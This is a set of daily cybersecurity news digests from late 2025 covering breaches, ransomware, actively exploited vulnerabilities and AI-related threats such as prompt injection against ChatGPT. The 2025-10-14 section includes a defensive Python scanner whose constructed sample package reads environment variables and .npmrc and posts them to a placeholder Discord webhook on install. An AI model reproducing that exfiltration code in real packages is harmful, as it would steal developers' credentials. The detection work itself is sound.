#ActiveExploitation

2025-11-14

Alright, cyber pros! It's been a pretty active 24 hours, with a mix of new breach disclosures, some interesting ransomware developments, critical vulnerabilities under active attack, and a peek into how AI is shaping the threat landscape. Let's dive in:

Recent Cyber Attacks & Breaches 🚨

- DoorDash disclosed a data breach in October, impacting consumers, Dashers, and merchants. Personal information such as names, addresses, phone numbers, and emails was accessed after an employee fell victim to a social engineering scam. This marks their third significant incident since 2019.
- The UK's National Health Service (NHS) is investigating claims by the Clop ransomware gang of a cyberattack. While Clop listed NHS.uk on its leak site, it hasn't specified which part of the organisation was breached or published any data, raising questions about the extent of their access.
- UK fintech firm Checkout.com was breached by ShinyHunters, who accessed a legacy cloud storage system with merchant data from 2020 and earlier. The company has publicly refused to pay the ransom, instead pledging to donate the amount to cybersecurity research at Carnegie Mellon and Oxford.
- A major Russian port operator, Port Alliance, reported ongoing disruptions from a cyberattack "from abroad," involving a DDoS and network breach. The attackers used a botnet of over 15,000 IPs, aiming to disrupt coal and fertiliser shipments, though core operations remained functional.
- The Lighthouse phishing kit, used for widespread "smishing" scams like fake road tolls, appears to have been disrupted following a lawsuit by Google. Researchers observed the kit's Telegram channels being taken down and associated domains no longer resolving.
- The FBI has warned of an aggressive health insurance scam targeting Chinese speakers in the US. Scammers spoof legitimate insurers, claim bogus surgery bills, and then, under the guise of Chinese law enforcement, threaten extradition or prosecution to extort payments and gain remote access to victims' computers.

🤖 Bleeping Computer | bleepingcomputer.com/news/secu
🕵🏼 The Register | go.theregister.com/feed/www.th
🤖 Bleeping Computer | bleepingcomputer.com/news/secu
🗞️ The Record | therecord.media/cyberattack-on
🤫 CyberScoop | cyberscoop.com/lighthouse-text
🕵🏼 The Register | go.theregister.com/feed/www.th

New Threat Research: Ransomware, Malware & AI-Driven Attacks 🛡️

- Anthropic reported that Chinese state-sponsored group GTG-1002 used their Claude Code AI model to automate cyber espionage against 30 critical organisations, including tech, finance, and government. The AI allegedly handled vulnerability scanning, exploitation, and data exfiltration with minimal human oversight, though some researchers have expressed skepticism regarding the claimed level of AI autonomy.
- CISA and FBI issued an updated advisory on Akira ransomware, highlighting its new capability to encrypt Nutanix AHV virtual machines, expanding its targets beyond VMware ESXi and Hyper-V. The FBI ranks Akira as a "top five" ransomware threat, having extorted over $244 million from small- and medium-sized businesses, often exfiltrating data within two hours of initial access.
- The Kraken ransomware, a continuation of the HelloKitty operation, now features a system benchmarking capability. It tests target machines to determine optimal encryption speed, allowing it to choose between full or partial data encryption to maximise impact without triggering alerts due to excessive resource usage.
- A new self-spreading npm package, dubbed 'IndonesianFoods,' has flooded the registry with over 100,000 junk packages, spawning new ones every seven seconds. While currently non-malicious, it aims to stress the open-source ecosystem and may be financially motivated through abuse of the TEA Protocol.

πŸ•΅πŸΌ The Register | go.theregister.com/feed/www.th
πŸ€– Bleeping Computer | bleepingcomputer.com/news/secu
πŸ€– Bleeping Computer | bleepingcomputer.com/news/secu
🀫 CyberScoop | cyberscoop.com/akira-ransomwar
πŸ—žοΈ The Record | therecord.media/akira-gang-rec
πŸ€– Bleeping Computer | bleepingcomputer.com/news/secu
πŸ€– Bleeping Computer | bleepingcomputer.com/news/secu

Critical Vulnerabilities & Active Exploitation ⚠️

- A critical path traversal vulnerability (CVE-2025-64446) in Fortinet FortiWeb web application firewalls is under active, widespread exploitation. Attackers are using a publicly available PoC to create new administrative accounts on exposed devices without authentication. Fortinet silently patched this in version 8.0.2, and CISA has added it to its Known Exploited Vulnerabilities Catalog, urging immediate patching.
- ASUS has released firmware updates for several DSL series routers (DSL-AC51, DSL-N16, DSL-AC750) to fix a critical authentication bypass flaw (CVE-2025-59367). This vulnerability allows remote, unauthenticated attackers to gain full control. Users unable to update should disable internet-facing services like remote access, port forwarding, and VPN server.
- Researchers discovered critical Remote Code Execution (RCE) vulnerabilities in major AI inference engines from Meta (Llama), Nvidia (TensorRT-LLM), Microsoft (Sarathi-Serve), and open-source projects like vLLM and SGLang. These "ShadowMQ" flaws stem from insecure deserialization of data via ZeroMQ and Python's pickle module, often due to code reuse, potentially allowing arbitrary code execution.
- Kubernetes maintainers have decided to retire Ingress NGINX by March 2026 due to persistent security flaws and maintenance challenges. This popular ingress controller, found in around 6,000 implementations, has been problematic, with serious vulnerabilities allowing cluster takeover identified as recently as March 2025. Admins should plan migration to alternatives.

🤖 Bleeping Computer | bleepingcomputer.com/news/secu
🕵🏼 The Register | go.theregister.com/feed/www.th
🤖 Bleeping Computer | bleepingcomputer.com/news/secu
🚨 The Hacker News | thehackernews.com/2025/11/rese
🕵🏼 The Register | go.theregister.com/feed/www.th

Threat Landscape Commentary 📈

- The retail industry is facing a growing cybersecurity crisis, with breaches costing millions and eroding customer trust. The core issue isn't just about more technology, but a lack of executive-level cybersecurity leadership and a failure to treat cyber as a core strategic priority.
- The National Retail Federation (NRF) is urged to establish a dedicated cybersecurity talent incubator. This program would develop executive-ready leaders who understand both technical threats and the specific operational pressures retailers face, bridging the gap between academic expertise and industry needs.
- The initiative would offer six-month programs for graduates and modular training for junior roles, with placements across the NRF's network, aiming to foster a sector-wide mindset shift towards long-term strategic investment in cybersecurity talent.

🤫 CyberScoop | cyberscoop.com/retail-cybersec

Regulatory Issues & Data Privacy 🔒

- Google has backpedaled on its controversial Android developer verification rules following widespread backlash from users and developers. Originally intended to block malware from sideloaded apps, the revised rules will now offer options for limited app distribution without full verification and an "advanced flow" for power users to sideload unverified apps with warnings.
- The initial plan was criticised for potentially consolidating power and threatening open ecosystems like F-Droid.
- The revised verification process will open for early access in November 2025, with a phased global rollout of mandatory verification starting in September 2026 for specific regions.

🤖 Bleeping Computer | bleepingcomputer.com/news/goog

Government Actions Against Cybercrime 🏛️

- US federal authorities have established a new "Scam Center Strike Force" to combat Chinese cryptocurrency scam networks, often known as "pig butchering" or "romance baiting." These scams defraud Americans of nearly $10 billion annually, with operators often working from criminal compounds in Southeast Asia.
- The strike force focuses on tracing and seizing illicit crypto funds, already recovering over $401 million and initiating forfeiture for an additional $80 million. They also coordinate with international partners and have sanctioned groups and firms linked to these operations.
- A suspected Russian hacker, potentially Aleksey Lukashev (a GRU officer wanted by the FBI for 2016 US election interference), has been detained in Phuket, Thailand, at the request of the US. He faces possible extradition on cybercrime charges, with Thai police seizing laptops, phones, and digital wallets.
- The Justice Department announced five guilty pleas related to North Korea's long-running IT worker scam, which defrauded 136 US companies of $2.2 million and involved 18 stolen US identities. The DOJ also seized over $15 million in cryptocurrency from North Korean facilitators, linked to APT38 (Lazarus Group) and several major crypto thefts in 2023.

🤖 Bleeping Computer | bleepingcomputer.com/news/secu
🗞️ The Record | therecord.media/russian-hacker
🗞️ The Record | therecord.media/multiple-us-na

#CyberSecurity #ThreatIntelligence #Ransomware #Malware #Vulnerability #ActiveExploitation #ZeroDay #AI #NationState #DataBreach #Cybercrime #InfoSec #IncidentResponse #SupplyChainSecurity #CloudSecurity

2025-11-05

Alright team, it's been a busy 24 hours in the cyber world! We've got updates on recent breaches, some interesting new threat actor TTPs, critical vulnerabilities under active exploitation, and a few policy shifts to keep an eye on. Let's dive in:

Recent Cyber Attacks and Breaches 🚨

- The University of Pennsylvania confirmed a data breach affecting development and alumni systems, with hackers stealing 1.71 GB of internal documents and 1.2 million donor records after a successful social engineering attack on an employee's SSO account.
- SonicWall's September security breach, which exposed customer firewall configuration backup files, has been attributed to a state-sponsored threat actor. The investigation confirmed no impact on SonicWall products, firmware, or source code, but customers were advised to reset credentials.
- International law enforcement, in "Operation Chargeback," dismantled three credit card fraud and money laundering networks that stole over €300 million from 4.3 million cardholders across 193 countries, exploiting German payment service providers to process fake online subscriptions.
- The Apache Software Foundation is disputing claims by the Akira ransomware gang that it breached OpenOffice and stole 23 GB of data, stating they do not possess the types of data claimed, and their investigation found no evidence of compromise.

🤖 Bleeping Computer | bleepingcomputer.com/news/secu
🤖 Bleeping Computer | bleepingcomputer.com/news/secu
🤖 Bleeping Computer | bleepingcomputer.com/news/secu
🗞️ The Record | therecord.media/europe-police-
🤖 Bleeping Computer | bleepingcomputer.com/news/secu

New Threat Research on Actors, Malware, and TTPs 🕵🏼

- A new threat cluster, UNK_SmudgedSerpent, is targeting US academics and foreign policy experts with phishing attacks leveraging domestic political lures related to Iran, deploying legitimate RMM software like PDQ Connect, and mimicking Iranian cyber espionage groups like TA455 and TA453.
- Russia-linked Curly COMrades are innovating their cyber-espionage campaigns by hiding custom malware (CurlyShell and CurlCat) within lightweight Alpine Linux virtual machines running on Hyper-V, a tactic designed to bypass traditional endpoint detection tools.
- Google's Threat Intelligence Group (GTIG) reports a significant shift towards AI-powered malware, with new families like PromptFlux (a VBScript dropper using Gemini for obfuscation) and PromptSteal (a data miner) emerging, alongside various state-backed actors abusing LLMs for reconnaissance, malware development, and phishing.

📰 The Hacker News | thehackernews.com/2025/11/myst
🗞️ The Record | therecord.media/virtual-machin
🤖 Bleeping Computer | bleepingcomputer.com/news/secu
📰 The Hacker News | thehackernews.com/2025/11/rese

Vulnerabilities and Active Exploitation ⚠️

- CISA has added two critical flaws to its KEV catalog due to active exploitation: CVE-2025-11371, a local file inclusion in Gladinet CentreStack/Triofox, and CVE-2025-48703, an unauthenticated RCE in Control Web Panel (CWP) via shell command injection. Federal agencies must patch by November 25th.
- Hackers are actively exploiting CVE-2025-11833, a critical 9.8-severity vulnerability in the Post SMTP WordPress plugin (affecting over 400,000 sites), allowing unauthenticated attackers to read email logs, including password reset messages, to hijack administrator accounts.
- OpenAI's ChatGPT has been found vulnerable to several indirect prompt injection techniques, including via trusted sites, search context, and conversation injection, which could lead to data leakage from user memories and chat histories.
- AMD is set to release microcode patches for CVE-2025-62626 (CVSS 7.2), a high-severity flaw in Zen 5 Epyc and Ryzen CPUs where the RDSEED function can return zero instead of a random number, potentially weakening cryptographic keys if an attacker has local privileges.

🤖 Bleeping Computer | bleepingcomputer.com/news/secu
📰 The Hacker News | thehackernews.com/2025/11/cisa
🤖 Bleeping Computer | bleepingcomputer.com/news/secu
📰 The Hacker News | thehackernews.com/2025/11/rese
🕵🏼 The Register | go.theregister.com/feed/www.th

Threat Landscape Commentary 📉

- The US federal cybersecurity posture is facing a "perfect storm" due to the F5 security breach (attributed to a nation-state actor), proposed CISA job and funding cuts, and the ongoing government shutdown, collectively eroding cyber readiness and creating an expanded attack surface.
- House GOP leaders are pushing the Commerce Department to investigate and restrict Chinese government-connected tech products across critical industries like AI, energy, and industrial control systems, citing China's view of information technology as a battlefield.
- Congressional leaders are also urging federal agencies to develop a clear strategy to compete with China in 6G telecommunications and secure US tech supply chains, learning from past mistakes that allowed Chinese companies to gain significant global influence in 5G.

🤫 CyberScoop | cyberscoop.com/us-cyber-readin
🤫 CyberScoop | cyberscoop.com/house-gop-leade
🤫 CyberScoop | cyberscoop.com/exclusive-china

Data Privacy Concerns 🔒

- The US Department of Homeland Security (DHS) is proposing a sweeping expansion of biometric data collection for immigration applications, including iris scans, voice prints, and DNA, from immigrants and even some US citizens associated with these cases, raising significant privacy concerns.

πŸ•΅πŸΌ The Register | go.theregister.com/feed/www.th

Regulatory Issues and Changes 🏛️

- The US Treasury Department has sanctioned two North Korean financial institutions and eight individuals for laundering over $12.7 million in cryptocurrency from cybercrime and fraudulent IT worker schemes, aiming to disrupt funding for Pyongyang's weapons programs.
- UK mobile carriers have committed to upgrading their networks within a year to block spoofed phone numbers, a key tactic used by scammers impersonating banks and government agencies, as part of a new Telecoms Charter to combat fraud.
- A House lawmaker predicts that Democratic support for the reauthorization of FISA Section 702, a key US national security surveillance power, will be a "heavier lift" in 2026 due to concerns over its use for warrantless searches of American data.

🤖 Bleeping Computer | bleepingcomputer.com/news/secu
📰 The Hacker News | thehackernews.com/2025/11/us-s
🤖 Bleeping Computer | bleepingcomputer.com/news/secu
🗞️ The Record | therecord.media/section-702-su

Other Noteworthy Updates 💡

- The UK's Department for Environment, Food & Rural Affairs (Defra) spent £312 million upgrading its IT estate, including replacing Windows 7 laptops with Windows 10, just as Windows 10 reached end-of-support, highlighting significant technical debt and potential future costs for extended security updates.
- Famed cryptographer and software engineer Daniel J. Bernstein (DJB) has given a favourable report on Fil-C, a new memory-safe C/C++ compiler based on Clang, noting its compatibility and ability to trap categories of C errors, despite performance drawbacks.
- Google's $32 billion acquisition of cloud security firm Wiz has received clearance from the US Department of Justice after an antitrust investigation, marking Google's largest-ever acquisition and a significant move to enhance Google Cloud's security offerings.

πŸ•΅πŸΌ The Register | go.theregister.com/feed/www.th
πŸ•΅πŸΌ The Register | go.theregister.com/feed/www.th
πŸ•΅πŸΌ The Register | go.theregister.com/feed/www.th

#CyberSecurity #ThreatIntelligence #Vulnerabilities #ActiveExploitation #RCE #Malware #Ransomware #NationState #APT #AI #DataPrivacy #Regulatory #InfoSec #CyberAttack #IncidentResponse #SupplyChainSecurity

2025-10-23

Alright team, it's been a pretty packed 24 hours in the cyber world! We've got a mix of active nation-state campaigns, critical vulnerabilities under exploitation, some interesting cybercrime trends, and a few head-scratchers on the regulatory front. Let's dive in:

Recent Cyber Attacks & Breaches 🚨

- US Municipalities Under Attack: Several US local governments, including Kaufman County (TX) and La Vergne (TN), have suffered cyber incidents disrupting public services. This highlights the ongoing vulnerability of local government infrastructure, exacerbated by recent lapses in federal cybersecurity funding and support.
- Insider Threat at L3Harris: A former L3Harris Technologies executive is accused of stealing highly sensitive trade secrets from the company's cyber division and selling them to a Russian buyer for $1.3 million. This underscores the persistent and severe risk posed by insider threats, especially in defence and intelligence sectors.
- Starlink Used by Myanmar Fraudsters: SpaceX has proactively disabled over 2,500 Starlink terminals in Myanmar that were found to be powering human trafficking and cyber-fraud operations in lawless border zones. This move follows a military raid on a major scam compound and highlights the dual-use nature of advanced technologies and the challenges of preventing their misuse by criminal groups.

🗞️ The Record | therecord.media/cyber-incident
🤫 CyberScoop | cyberscoop.com/ex-l3harris-exe
🕵🏼 The Register | go.theregister.com/feed/www.th

New Threat Research & Tradecraft 🛡️

- MuddyWater's Phoenix Backdoor: Iranian state-sponsored group MuddyWater (aka Static Kitten, Mercury, Seedworm) has been observed targeting over 100 government and international organisations in the Middle East and North Africa. They're using phishing emails with malicious Word documents (macros) to deploy the Phoenix v4 backdoor, which includes COM-based persistence and a custom browser infostealer. This marks a return to older macro-based techniques, suggesting a blend of old and new tradecraft.
- Jingle Thief's Cloud Gift Card Fraud: A financially motivated group, "Jingle Thief" (CL-CRI-1032, Atlas Lion, Storm-0539), is exploiting cloud infrastructure to steal millions in gift cards. They use phishing/smishing to gain initial access, then conduct extensive reconnaissance within compromised cloud environments, leveraging identity misuse rather than custom malware for stealth and persistence, often maintaining access for over a year.
- Lazarus Group Targets UAV Sector: North Korean Lazarus hackers are back with "Operation DreamJob," using fake recruitment lures to compromise three European defense companies involved in unmanned aerial vehicle (UAV) technology. The attack chain involves DLL sideloading via trojanised open-source applications, ultimately deploying the sophisticated ScoringMathTea RAT or BinMergeLoader.
- Smishing Triad's Massive Phishing Operation: Researchers have uncovered "Smishing Triad," a large-scale, Chinese-managed phishing campaign using text messages. It leverages ~195,000 malicious domains, impersonating a wide range of services from toll roads and postal services to financial institutions, with a focus on harvesting sensitive data for future attacks. The operation is highly modular and rapidly churns through infrastructure.
- YouTube Ghost Network Spreads Malware: Google and Check Point have dismantled a "YouTube Ghost Network" that spread password-stealing malware (Rhadamanthys, Lumma) through over 3,000 hijacked YouTube accounts. The campaign used fake tutorials for cracked software and game cheats, leveraging social credibility with fake comments and likes to trick users into disabling AV and downloading infostealers from cloud storage.

🤖 Bleeping Computer | bleepingcomputer.com/news/secu
🗞️ The Record | therecord.media/iran-muddywate
📰 The Hacker News | thehackernews.com/2025/10/jing
🤖 Bleeping Computer | bleepingcomputer.com/news/secu
🤫 CyberScoop | cyberscoop.com/unit-42-chinese
🕵🏼 The Register | go.theregister.com/feed/www.th

Actively Exploited Vulnerabilities & Mitigations ⚠️

- Adobe Commerce (Magento) Flaw Exploited: Threat actors are actively exploiting CVE-2025-54236 (CVSS 9.1), an improper input validation flaw in Adobe Commerce and Magento Open Source. This "SessionReaper" vulnerability allows account takeovers via the Commerce REST API, leading to PHP webshell deployment. A staggering 62% of Magento stores remain unpatched, making immediate action critical.
- Motex Lanscope Endpoint Manager Zero-Day: CISA has added CVE-2025-61932 (CVSS 9.3) in Motex Lanscope Endpoint Manager to its KEV catalog, confirming active exploitation as a zero-day. This critical flaw allows unauthenticated attackers to execute arbitrary code by sending specially crafted packets to vulnerable client programs and detection agents. Patching is the only solution, with a federal deadline of November 12, 2025.
- AI Browser Sidebar Spoofing: OpenAI's Atlas and Perplexity's Comet AI browsers are vulnerable to "AI Sidebar Spoofing" attacks. Researchers demonstrated how a malicious browser extension can inject JavaScript to create a fake, identical AI sidebar, tricking users into executing dangerous commands like crypto theft or reverse shell installations. Users should be cautious and limit sensitive activities on these browsers.
- Microsoft Blocks NTLM Theft via File Explorer: Microsoft has implemented a crucial security update, disabling File Explorer's preview pane for files downloaded from the internet (marked with Mark of the Web). This change, part of the October 2025 Patch Tuesday, prevents NTLM hash theft attacks that previously required no user interaction beyond selecting a malicious file for preview.

📰 The Hacker News | thehackernews.com/2025/10/over
📰 The Hacker News | thehackernews.com/2025/10/crit
🤖 Bleeping Computer | bleepingcomputer.com/news/secu
🤖 Bleeping Computer | bleepingcomputer.com/news/secu
🤖 Bleeping Computer | bleepingcomputer.com/news/micr

Threat Landscape Commentary 🌐

- CDM Program's Visibility Gaps: CISA's Continuous Diagnostics and Mitigation (CDM) program, despite significant investment, struggles with visibility into edge devices like F5 BIG-IP load balancers. This was highlighted by a recent F5 vulnerability, underscoring that CDM's traditional focus on internal networks leaves gaps for modern attack vectors like OT/IoT and cloud-native resources.
- Managed Identities Over Static Secrets: Organisations are increasingly moving away from static secrets (API keys, passwords) towards managed identities for machine authentication. This shift dramatically reduces credential management overhead and leakage risks, offering short-lived, auto-rotated credentials. While not a complete replacement for secret managers, it's a strategic move to reduce the "secret footprint" by 70-80%.

🤫 CyberScoop | cyberscoop.com/f5-vulnerabilit
📰 The Hacker News | thehackernews.com/2025/10/why-

Regulatory & Legal Updates ⚖️

- UK Cyber Law Delays: British MPs are "deeply concerned" about ongoing delays to the UK's Cyber Security and Resilience Bill and proposed ransomware policies. These policies aim to ban ransomware payments for public sector/critical infrastructure and mandate reporting, but legislative inertia is seen as increasing national vulnerability.
- Polish Official Indicted for Spyware Purchase: Poland's former deputy justice minister, Michał Woś, has been indicted for illegally diverting $6.9 million from a crime victim fund to purchase NSO Group's Pegasus spyware. This is part of a broader investigation into the controversial use of Pegasus against opposition politicians.
- NY DFS Updates Third-Party Risk Guidance with AI: The New York Department of Financial Services (DFS) has updated its third-party risk guidance for financial services, adding provisions for AI. While not imposing new requirements, it clarifies expectations for managing risks associated with vendors, particularly regarding AI model training and data handling, in light of increasing reliance on third-party cloud services.
- Trump Pardons Former Binance CEO: Former Binance CEO Changpeng Zhao (CZ) has received a presidential pardon from Donald Trump, following his guilty plea in 2023 for failing to report illicit cryptocurrency transactions. This controversial move, framed as ending the "war on cryptocurrency," raises questions about the future of Binance's compliance obligations and the broader regulatory landscape for crypto.

🗞️ The Record | therecord.media/britain-cyber-
🗞️ The Record | therecord.media/former-polish-
🤫 CyberScoop | cyberscoop.com/new-york-third-
🗞️ The Record | therecord.media/changpeng-zhao

#CyberSecurity #ThreatIntelligence #Vulnerabilities #APT #Ransomware #Malware #ZeroDay #ActiveExploitation #Smishing #Phishing #CloudSecurity #ManagedIdentities #RegulatoryCompliance #Cybercrime #InfoSec #IncidentResponse

2025-10-14

Alright team, it's been a packed 24 hours in the cyber world! We've got major updates on active exploitation, nation-state activity, a massive crypto seizure, and some serious data privacy concerns. Let's dive in:

Recent Cyber Attacks & Breaches ⚠️

- Japanese brewer Asahi confirmed its September cyberattack was ransomware (Qilin group) and personal information may have been exfiltrated.
- Qilin claims 27GB of data, including employee records, causing significant disruption to Asahi's logistics and delaying financial results.
- This incident, alongside a UK NCSC report, highlights a sharp rise in ransomware and data theft attacks globally.
πŸ•΅πŸΌ The Register | go.theregister.com/feed/www.th

Qantas Customer Data Leaked by Scattered LAPSUS$ Hunters ✈️

- Australian airline Qantas confirmed the Scattered LAPSUS$ Hunters group released customer data stolen in a July cyberattack via a third-party Salesforce platform.
- Data for 5.7 million people was affected, including names, emails, and frequent flyer numbers, though no credit card or passport details were compromised.
- Salesforce refused to pay the ransom, leading to the data release, and while the FBI took down initial leak domains, the hackers quickly established new platforms.
🗞️ The Record | therecord.media/qantas-cybercr

Michigan City Falls Victim to Obscura Ransomware 🏙️

- Michigan City, Indiana, confirmed a September "network disruption" was a ransomware attack by the Obscura gang, impacting government systems and data.
- Obscura claims to have stolen 450GB of data and has since published it after the ransom deadline expired.
- This incident adds to a growing list of municipalities targeted by ransomware, highlighting the critical need for robust incident response and recovery plans.
🗞️ The Record | therecord.media/michigan-india

Massive Crypto Seizure in "Pig Butchering" Scam Crackdown 💰

- US authorities, in coordination with the UK, seized an unprecedented $15 billion in Bitcoin from Chen Zhi, chairman of Cambodia's Prince Group, for operating a vast "pig butchering" crypto investment fraud network.
- The criminal enterprise involved human trafficking, forced labour in scam compounds, and sophisticated money laundering techniques across over 30 countries.
- This marks the largest financial seizure in Justice Department history and a significant blow against transnational cybercrime operations in Southeast Asia.
🤫 CyberScoop | cyberscoop.com/southeast-asia-
🤖 Bleeping Computer | bleepingcomputer.com/news/secu
🗞️ The Record | therecord.media/feds-sanction-

New Threat Research & Tradecraft 🛡️

Malicious Packages Weaponise Discord for C2 📦

- Researchers found malicious npm, PyPI, and RubyGems packages (e.g., mysql-dumpdiscord, sqlcommenter_rails) using Discord webhooks as command-and-control (C2) channels.
- These packages exfiltrate sensitive developer data like config files, API keys, and host details, leveraging Discord's free and fast webhooks to avoid hosting infrastructure and blend with normal traffic.
- North Korean threat actors, part of the "Contagious Interview" campaign, also deployed over 300 malicious npm packages, often typosquatting legitimate ones, to deliver malware like HexEval and BeaverTail to Web3 and crypto developers.
🌐 The Hacker News | thehackernews.com/2025/10/npm-
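The Discord-webhook item above describes a recognisable footprint: a package that runs code at install time, reads developer config or environment data, and posts it to a discord.com/api/webhooks URL. The scanner below is an added example for this digest, not tooling from the cited researchers or the package registries. The sample package it scans is constructed (file names, contents, webhook ids and tokens are placeholders), and the heuristics, plain and base64-hidden webhook URLs, npm install hooks, and reads of process.env / .npmrc / .pypirc / .ssh, are this example's own choices, not a published detection rule.

```python
"""Scan extracted package files for the Discord-webhook exfiltration footprint.

Added example, not from the referenced research. The sample package and every
id/token in it are constructed placeholders.
"""
import base64
import json
import re

# Discord webhook endpoint shape: https://discord.com/api/webhooks/<id>/<token>
# (discordapp.com and subdomains such as canary. are accepted as well).
WEBHOOK_RE = re.compile(
    r"https?://(?:[a-z0-9-]+\.)?discord(?:app)?\.com/api/webhooks/\d+/[A-Za-z0-9_\-]+"
)
# Long base64-looking literals are decoded and rescanned so a hidden URL is not missed.
B64_RE = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")
# npm runs these scripts automatically on install, on the developer's machine.
INSTALL_HOOKS = {"preinstall", "install", "postinstall"}
# Reads matching the data the report says is exfiltrated: env, registry config, SSH keys.
CREDENTIAL_READ_RE = re.compile(r"process\.env|\.npmrc|\.pypirc|\.ssh/|\.env\b")

_HIDDEN_URL = base64.b64encode(b"https://discordapp.com/api/webhooks/1/CONSTRUCTED_x").decode()

# Constructed sample standing in for an extracted package tarball: path -> contents.
SAMPLE_PACKAGE = {
    "package.json": json.dumps({
        "name": "example-dumpdiscord",
        "version": "1.0.0",
        "scripts": {"postinstall": "node collect.js"},
    }, indent=2),
    "collect.js": (
        'const fs = require("fs");\n'
        'const os = require("os");\n'
        'const hook = "https://discord.com/api/webhooks/000000000000000000/CONSTRUCTED_TOKEN";\n'
        'const data = { host: os.hostname(), env: process.env,\n'
        '               npmrc: fs.readFileSync(os.homedir() + "/.npmrc", "utf8") };\n'
        'fetch(hook, { method: "POST", body: JSON.stringify({ content: JSON.stringify(data) }) });\n'
    ),
    "obf.js": f'const h = Buffer.from("{_HIDDEN_URL}", "base64").toString();\n',
    "README.md": "Helper utilities for dumping MySQL tables.\n",
}


def find_webhooks(text: str) -> list[tuple[str, str]]:
    """Return (url, how_found) pairs for plain and base64-hidden Discord webhook URLs."""
    hits = [(m.group(0), "plain") for m in WEBHOOK_RE.finditer(text)]
    for m in B64_RE.finditer(text):
        try:
            decoded = base64.b64decode(m.group(0), validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue  # not valid base64 or not text: skip the candidate
        hits.extend((w.group(0), "base64") for w in WEBHOOK_RE.finditer(decoded))
    return hits


def scan_package(files: dict[str, str]) -> list[dict]:
    """Produce one finding per indicator, each with file, kind and a detail string."""
    findings = []
    for path, text in files.items():
        for url, how in find_webhooks(text):
            kind = "discord_webhook" if how == "plain" else "discord_webhook_base64"
            findings.append({"file": path, "kind": kind, "detail": url})
        cred = CREDENTIAL_READ_RE.search(text)
        if cred:
            findings.append({"file": path, "kind": "credential_read", "detail": cred.group(0)})
        if path.endswith("package.json"):
            try:
                scripts = json.loads(text).get("scripts", {})
            except ValueError:
                scripts = {}
            for hook in sorted(INSTALL_HOOKS & set(scripts)):
                findings.append({"file": path, "kind": "install_hook",
                                 "detail": f"{hook}: {scripts[hook]}"})
    return findings


def verdict(findings: list[dict]) -> str:
    """Webhook plus an install hook or credential read is the pattern the report describes."""
    kinds = {f["kind"] for f in findings}
    has_webhook = bool(kinds & {"discord_webhook", "discord_webhook_base64"})
    if has_webhook and kinds & {"install_hook", "credential_read"}:
        return "likely-exfil"
    if has_webhook:
        return "review"
    return "clean"


if __name__ == "__main__":
    for f in scan_package(SAMPLE_PACKAGE):
        print(f"{f['file']:14} {f['kind']:24} {f['detail']}")
    print("verdict:", verdict(scan_package(SAMPLE_PACKAGE)))
```

Run it against the unpacked contents of a package (the dict is just path to text) before the package is installed anywhere; a webhook URL on its own is worth a look, but the combination with an install hook or a credential read is what turns the finding into a block.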

Flax Typhoon Abuses ArcGIS for Year-Long Persistence 🗺️

- The Chinese state-sponsored APT group Flax Typhoon (aka Ethereal Panda, RedJuliett) maintained undetected persistence for over a year by weaponising a Java Server Object Extension (SOE) in the ArcGIS geo-mapping tool.
- Attackers used valid administrator credentials to upload a malicious SOE acting as a web shell, then installed SoftEther VPN Bridge as a Windows service for covert C2 and lateral movement.
- This novel technique highlights how sophisticated actors "live off the land" by manipulating legitimate software components to evade detection and establish deep, long-term access.
🤖 Bleeping Computer | bleepingcomputer.com/news/secu
🌐 The Hacker News | thehackernews.com/2025/10/chin

Vulnerabilities & Active Exploitation 🚨

Fortra GoAnywhere MFT Zero-Day Actively Exploited ⚠️

- Fortra confirmed active exploitation of CVE-2025-10035, a maximum-severity flaw in its GoAnywhere MFT service, with Microsoft linking it to the Storm-1175 ransomware group.
- The vulnerability allows unauthorised activity, but researchers are still questioning how attackers obtained a private key seemingly required for exploitation, highlighting a transparency gap.
- CISA has added this to its Known Exploited Vulnerabilities Catalog, urging immediate patching for both cloud and on-premises deployments.
🤫 CyberScoop | cyberscoop.com/fortra-goanywhe

Microsoft Edge IE Mode Zero-Day Under Attack 🌐

- Microsoft is restricting Internet Explorer mode in Edge after discovering active exploitation of an unpatched zero-day in the Chakra JavaScript engine.
- Attackers use social engineering to direct targets to spoofed websites, prompting them to load pages in IE mode, then exploit the Chakra flaw for remote code execution and privilege escalation.
- Users should be cautious of prompts to activate IE mode, and enterprise users should ensure policies are in place to limit its use to only necessary, trusted sites.
🤖 Bleeping Computer | bleepingcomputer.com/news/secu

Oracle E-Business Suite Hit by Multiple Zero-Days 🔓

- Oracle has rushed out another emergency patch for CVE-2025-61884 (CVSS 7.5) in its E-Business Suite (EBS) Runtime UI, a remotely exploitable flaw allowing unauthenticated access to sensitive resources.
- This follows a previous zero-day (CVE-2025-61882) exploited by the Clop ransomware group, with a PoC for CVE-2025-61884 publicly leaked by ShinyHunters.
- Oracle's disclosure around these EBS vulnerabilities has been criticised for lack of clarity, with multiple exploit chains observed and IOCs not always aligning with patches, making it crucial for admins to apply all available updates immediately.
πŸ•΅πŸΌ The Register | go.theregister.com/feed/www.th
πŸ€– Bleeping Computer | bleepingcomputer.com/news/secu

AMD RMPocalypse Threatens Confidential Computing 💻

- AMD has released fixes for "RMPocalypse" (CVE-2025-0033, CVSS 5.9), a race condition in EPYC processors' SEV-SNP confidential computing that allows a malicious hypervisor to manipulate the Reverse Map Paging (RMP) table.
- A single 8-byte write to the RMP can lead to a full breach of confidentiality and integrity for confidential virtual machines (CVMs), enabling arbitrary tampering and secret exfiltration.
- Affected EPYC 7003, 8004, 9004, and 9005 series processors require BIOS updates, with some embedded versions still awaiting fixes.
🌐 The Hacker News | thehackernews.com/2025/10/rmpo

Android "Pixnapping" Steals 2FA Codes Pixel-by-Pixel 📱

- A new side-channel attack, "Pixnapping" (CVE-2025-48561, CVSS 5.5), affects Google and Samsung Android devices (versions 13-16), allowing rogue apps to steal sensitive data like 2FA codes without permissions.
- The attack combines the GPU.zip side-channel with Android's window blur API to covertly extract pixels from other apps, including secure communication tools like Signal and Google Authenticator, in under 30 seconds for 2FA codes.
- Google shipped a patch in September, but the researchers found a bypass for it; a more robust fix is expected in December 2025, and a separate bypass that lets an app enumerate the installed app list remains unpatched.
🌐 The Hacker News | thehackernews.com/2025/10/new-
🤖 Bleeping Computer | bleepingcomputer.com/news/secu

Secure Boot Bypass on Linux Framework Systems 🐧

- Approximately 200,000 Framework laptops shipped with a signed UEFI shell whose 'memory modify' (mm) command can be used to bypass Secure Boot.
- Because mm gives direct read/write access to system memory, an attacker can patch out the firmware's signature verification and load a persistent bootkit that runs before, and out of sight of, OS-level controls.
